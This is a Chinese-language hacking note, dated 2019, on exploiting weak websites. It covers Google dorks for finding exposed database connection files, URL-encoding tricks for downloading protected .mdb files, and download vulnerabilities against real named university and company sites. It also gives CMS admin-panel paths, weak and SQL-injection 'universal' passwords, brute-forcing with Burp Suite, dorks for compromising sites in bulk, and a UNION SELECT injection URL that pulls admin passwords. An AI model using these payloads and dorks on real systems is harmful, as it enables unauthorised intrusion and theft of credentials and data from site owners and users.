弱漏洞利用網站
網站暴庫漏洞
暴庫(常是Access數據庫,文件格式:data.mdb;SQLserver、MySQL--->數據庫連接文件),就是通過一些技術或者程序漏洞得到數據庫的地址,並將數據庫非法下載到本地,
hacker非常樂意這種事件的發生,在得到網站數據庫之后,就可以得到網站管理員的賬號和密碼,對網站進行破壞與管理,也能通過數據庫的道德網站的隱私信息,甚至是最高權限。(目錄遍歷漏洞)
利用方法
inurl:/inc/conn.asp
inurl:inc+conn.asp to parent directort intext:
inurl:/inc/conn.asp
inurl:/inc+conn.asp to parent dirctory
所有可以目錄瀏覽的網頁都有一些相同的地方,主要有以下幾點:
to parent directory
last madifief Description
轉到父目錄
而利用Google語法來搜索的語句有:
intitle intext inurl site filetype等
搜索域名后綴,常見的域名后綴有:
com net mil org info gov edu biz coop areo pro int arpa
e.g
intext:to parent directory + intext:mdb site:fudan.edu.cn
inc/conn.asp--->inc%5cconn.asp(MySQL數據庫與可能的路徑)
暴庫繞過、過防下載
#sdsf.mdb
下載時改成 %23sdsf.mdb
#@!$%^&*asfkladsf@!#.mdb
%23@%21%24%25%5E%26%2aasdfkladsf@%21%23.mdb
高級語法暴庫
inurl:./.. admin ../.. add..
inurl:./.. admin../..del..
inurl:/.asp <id=<%<%<%
下載漏洞
http://ipo.snnu.edu.cn/
http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/201206122041778.doc
http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc
http://www.sxzzy.cn/ggis/news/down.asp?FileName=doc/2101-5/2012053010329973.doc
下載漏洞利用
通過蜘蛛爬行,找到該URL,下載conn.asp config.php config.asp db.mdb
網站后台密碼爆破(弱口令 bp)
為了方便管理網站,cms系統暢游管理員后台管理接口,輸入賬號密碼登錄進行管理
常見后台
網站常見的cms管理系統有:
織夢 idscuz 帝國 phpweb WordPress aspcms 科訊 南方 良精 ecshop等
對應的后台:
dede admin.php e/admin admin.php wp-admin admin admin admin admin admin
還有可能:manager login_admin login_manage login.asp
弱口令猜解
常見弱口令:admin admin888 admin123 123456等等
邏輯萬能秘鑰:
asp--> 'ro' = 'or'
php--> admin' or 1=1== admin' or '1'='1
破解工具:burpsuite discuz破解器 py腳本 httpfuzzer(針對帶驗證碼的)
針對性的一些工具:PKav HTTP Fuzzer
將找到的請求包放進去(請求地址,請求包),對密碼部分添加標記,對驗證碼部分添加標記,然后暴力破解。
網站漏洞EXP的利用
EXP是exploit(漏洞利用)的縮寫。當我們cms出現漏洞的時候,針對漏洞原理可以寫出針對該漏洞的exploit。
有的時候exp可以直接添加管理員或者getshell,爆出管理員賬號密碼,數據庫賬號密碼。
EXP利用
主流網站基本上都有漏洞和exp
e.g 織夢 phpcms strusl phpweb ...
EXP收集
百度 交流 利用工具
批量檢測站點
常用於某一類型的漏洞站點的安全檢測
批量拿站
關鍵詞:
有限公司 -- powered by AspCMS v2.0
powered by AspCms 2
powered by AspCms 2.0
AspCms 2.0
powere
關鍵字:inurl:newgoods.asp:action_key_order=news
利用方法:admin_shopxp/upLoad_bm.asp
漏洞利用:phpweb漏洞
關鍵字:
inurl:/class/?1.html
inurl:class/index.php?catid=0
inurl:/page/html/?1.html
inurl:news/html/?411.htm
默認后台地址:/admin.php
注入地址:
down/class/index.php?myord=1
news/class/index.php?showtag=
萬能密碼 admin 'or '1' =' 1
織夢批量,搜索關鍵字:
powered by DedeCMS_V57_UTF8_SP12004-2011 DesDev LNC
inurl:shopxp_news.asp
TEXTBOX2.Asp?action=madify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
2019-04-25 11:02:43